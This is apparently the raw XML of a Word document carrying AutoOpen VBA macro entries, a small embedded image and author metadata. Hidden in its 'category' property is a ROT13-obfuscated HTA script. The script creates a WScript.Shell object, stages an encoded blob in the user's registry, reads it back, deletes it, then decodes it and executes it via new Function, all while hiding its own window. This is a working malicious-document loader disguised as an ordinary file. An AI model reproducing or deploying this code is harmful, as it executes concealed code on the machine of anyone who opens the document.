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80C49E" w14:textId="712CC3AD" w:rsidR="00921FA4" w:rsidRDefault="00FB76A9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F562C81" wp14:editId="004EFC2C">
            <wp:extent cx="5924550" cy="12954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24550" cy="1295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921FA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68E5"/>
    <w:rsid w:val="005968E5"/>
    <w:rsid w:val="00921FA4"/>
    <w:rsid w:val="009E6F14"/>
    <w:rsid w:val="00FB76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B7FFEE3"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FF71C83A-7B8E-4D04-8AC2-43B90F9234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AQJSWH.AUTOOPEN" wne:name="Project.aQJSWH.AutoOpen" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.AHS4E.MAIN" wne:name="Project.ahS4E.main" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.AKGZQ.AGZCPH" wne:name="Project.aKgzq.agZCph" wne:bEncrypt="00" wne:cmg="56"/>
    <wne:mcd wne:macroName="PROJECT.AZTJGK.AHMIV" wne:name="Project.aztjgK.ahmi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0</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Manager/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thwnroi</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>alexpetrenko0@mail.ru</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-11-04T20:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-04T20:40:00Z</dcterms:modified>
  <cp:category>&lt;ugzy&gt;_x000d_
&lt;obql&gt;_x000d_
&lt;fpevcg ynathntr="wninfpevcg"&gt;_x000d_
nMFNZu = -42495;_x000d_
ine n9lDE = "nEpNqd";_x000d_
ine nHVm9o = n9lDE.gbHccrePnfr();_x000d_
ine nqXaZ = "nqC7g";_x000d_
nwmk1G = nqXaZ.yratgu;_x000d_
shapgvba qrpbqr(vachg)_x000d_
{_x000d_
ine xrlfge = "NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/=";_x000d_
ine bhgchg = "";_x000d_
ine pue1, pue2, pue3;_x000d_
ine rap1, rap2, rap3, rap4;_x000d_
ine v = 0;_x000d_
vachg = vachg.ercynpr(/[^N-Mn-m0-9\+\/\=]/t, "");_x000d_
juvyr (v &lt; vachg.yratgu)_x000d_
{_x000d_
rap1 = xrlfge.vaqrkBs(vachg.puneNg(v++));_x000d_
rap2 = xrlfge.vaqrkBs(vachg.puneNg(v++));_x000d_
rap3 = xrlfge.vaqrkBs(vachg.puneNg(v++));_x000d_
rap4 = xrlfge.vaqrkBs(vachg.puneNg(v++));_x000d_
pue1 = (rap1 &lt;&lt; 2) | (rap2 &gt;&gt; 4);_x000d_
pue2 = ((rap2 &amp; 15) &lt;&lt; 4) | (rap3 &gt;&gt; 2);_x000d_
pue3 = ((rap3 &amp; 3) &lt;&lt; 6) | rap4;_x000d_
bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue1);_x000d_
vs(rap3 != 64)_x000d_
{_x000d_
bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue2);_x000d_
}_x000d_
vs(rap4 != 64)_x000d_
{_x000d_
bhgchg = bhgchg + Fgevat.sebzPunePbqr(pue3);_x000d_
}_x000d_
}_x000d_
erghea(bhgchg);_x000d_
}_x000d_
ine nRnZ8 = snyfr;_x000d_
ine n8fguG = snyfr;_x000d_
ine nVnxz = "UXRL_PHEERAG_HFRE\\Fbsgjner\\zlfbsgjner1\\xrl1";_x000d_
ine nHxq1I = snyfr;_x000d_
ine nyqK6 = gehr;_x000d_
ine nIeX1 = snyfr;_x000d_
jvaqbj.erfvmrGb(1, 1);_x000d_
ine nuS2Y = gehr;_x000d_
ine nZQhWi = "nPGTO";_x000d_
ine n6bzT = 29464;_x000d_
jvaqbj.zbirGb(-101, -101);_x000d_
ine nkj3R = "nSuW84";_x000d_
ine nbzFa5 = nkj3R.gbYbjrePnfr();_x000d_
ine nPzyDq = -10882;_x000d_
ine nEPSK = arj NpgvirKBowrpg("jfpevcg.furyy");_x000d_
ine nNtv7I = "ngCKi9";_x000d_
ine nTENU = nNtv7I.gbYbjrePnfr();_x000d_
nm7AS = "nLvq3";_x000d_
nLkzIx = nm7AS.yratgu;_x000d_
ndPAh7 = "nKuAD0";_x000d_
nH36Mz = ndPAh7.gbFgevat();_x000d_
n0EFd = "nxJsS";_x000d_
ine nZmQrb = snyfr;_x000d_
ine nNz0sv = "nAIg0";_x000d_
ine nv3bDW = nNz0sv.gbFgevat();_x000d_
ine noUbf = "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";_x000d_
nvyG8n = -11090;_x000d_
nqL2SD = snyfr;_x000d_
ine n0mOxS = gehr;_x000d_
nlubJ4 = gehr;_x000d_
nlzkZF = 36568;_x000d_
nCoBY = 55304;_x000d_
nEPSK.ErtJevgr(nVnxz, noUbf, "ERT_FM");_x000d_
&lt;/fpevcg&gt;_x000d_
&lt;fpevcg ynathntr="iofpevcg"&gt;_x000d_
nbQZqC = nEPSK.ErtErnq(nVnxz)_x000d_
nEPSK.ErtQryrgr(nVnxz)_x000d_
&lt;/fpevcg&gt;_x000d_
&lt;fpevcg ynathntr="wninfpevcg"&gt;_x000d_
ine nY4NIZ = "nzEWwR";_x000d_
nCpW8i = nY4NIZ.gbFgevat();_x000d_
ine nL6SET = snyfr;_x000d_
nq0g8 = snyfr;_x000d_
nbQZqC = qrpbqr(nbQZqC);_x000d_
nwPA7I = -37764;_x000d_
ine nzN987 = 42106;_x000d_
nbQZqC = nbQZqC.ercynpr(/tjwv/vt, "");_x000d_
ine nlF92 = gehr;_x000d_
ine n2ysjV = "nXeFWw";_x000d_
ine nSUsx3 = arj Shapgvba("h", "p", nbQZqC);_x000d_
nol1x = "nMhdD";_x000d_
n2YOM = nol1x.gbHccrePnfr();_x000d_
ine nZNod = gehr;_x000d_
ine ns8FMW = gehr;_x000d_
nSUsx3("lRGLfSJr1y2YluzEfSJILcIEhcRpBcaGSuzJVkRId9vrsOKDUcTn2qSF3yJFOA0YyEKLxOKqi02ow5lZ2pGB5S2pmI2YibQp0EUn", 1);_x000d_
n90Z8p = "ndoln2";_x000d_
nkYLZg = snyfr;_x000d_
nHsGD = "neFX7";_x000d_
nOT0f = nHsGD.gbHccrePnfr();_x000d_
jvaqbj.pybfr();_x000d_
&lt;/fpevcg&gt;_x000d_
&lt;/obql&gt;_x000d_
&lt;/ugzy&gt;</cp:category>
</cp:coreProperties>
</file>